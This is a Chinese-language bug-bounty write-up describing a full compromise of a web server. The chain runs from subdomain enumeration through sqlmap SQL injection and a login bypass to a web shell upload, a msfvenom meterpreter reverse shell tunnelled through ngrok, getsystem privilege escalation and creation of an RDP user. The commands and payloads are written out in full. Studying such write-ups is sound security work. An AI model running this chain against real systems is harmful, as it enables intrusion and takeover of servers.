一顆小胡椒
正文
首先使用amass 和subfinder 枚舉子域,并借助 tomnomnom 制作的工具,即anew 。
amass enum -d site.com -passive | anew subs.txt && subfinder -d site.com -silent | anew subs.txt
之后,我使用httpx來過濾活動域,使用以下命令
cat subs.txt | httpx -mc 200 -o 200-subs.txt
由于只有幾個活動域,我在瀏覽器中一個一個地打開,我看到了這樣一個登錄頁面。
我嘗試輸入 ' 并顯示一條錯誤消息。
我立即使用SQLmap進行注入。使用以下命令
sqlmap -u “https://www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — dbs
等了一會,得到了幾個數據庫
然后我嘗試使用以下命令查看我的用戶是否為 root
sqlmap -u “https://www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — is-dba
是的,我獲得了root用戶,然后我嘗試使用以下命令獲取shell
sqlmap -u “https://www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — os-shell
不幸的是,我沒有得到反向連接,我真的很想轉儲數據,但不允許。
回到表單登錄,我嘗試使用 ('=''or') 繞過它,沒想到,我成功登錄了。
我很快繼續上傳一個 shell,它成功了。但是,所有目錄都顯示為紅色。
我在心里想:“我可以獲取管理員用戶嗎?” 我嘗試使用 Metasploit 和 Ngrok 進行反向連接。
打開終端并使用命令啟動 ngrok
ngrok TCP 1337
然后,我為反向連接創建了一個payload,因為這個網站使用的是 Windows 服務器,我使用以下命令創建了它
msfvenom -p windows/meterpreter/reverse_tcp lhost=*without tcp://* lport=*Enter the port* -f exe -o back.exe
之后,我運行了 Metasploit 并使用了以下命令
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 0.0.0.0set lport 1337 ( If you are using a different port, then use the port you specified when setting up “ngrok tcp port” )exploit
一切運行完畢后,就可以使用 webshell 上傳之前創建的 payload 了,然后使用命令執行功能來執行剛上傳的這個 Payload。
回到metasploit,成功獲取了backconnect。
我使用“shell”命令訪問命令提示符 (CMD),然后檢查我的用戶。
nt authority\*not_administrator*
使用命令“exit”返回到 meterpreter,然后我執行以下命令得到了管理員用戶
getsystemgetuid
之后,我新建了一個用戶,訪問RDP(Remote Desktop Protocol),報告成功獲取服務器訪問權限。
我立即報告了我的發現,并且由于我發現的錯誤,我收到了幾個確認和獎勵,因為它們包含多個網站。
可能我的就這些吧,希望能給大家一個參考,我是RyuuKhagetsu,下篇文章見。
合天網安實驗室
關鍵基礎設施安全應急響應中心
一顆小胡椒
系統安全運維
骨哥說事
LemonSec
安全圈
HACK學習呀
合天網安實驗室
LemonSec
聚銘網絡
系統安全運維
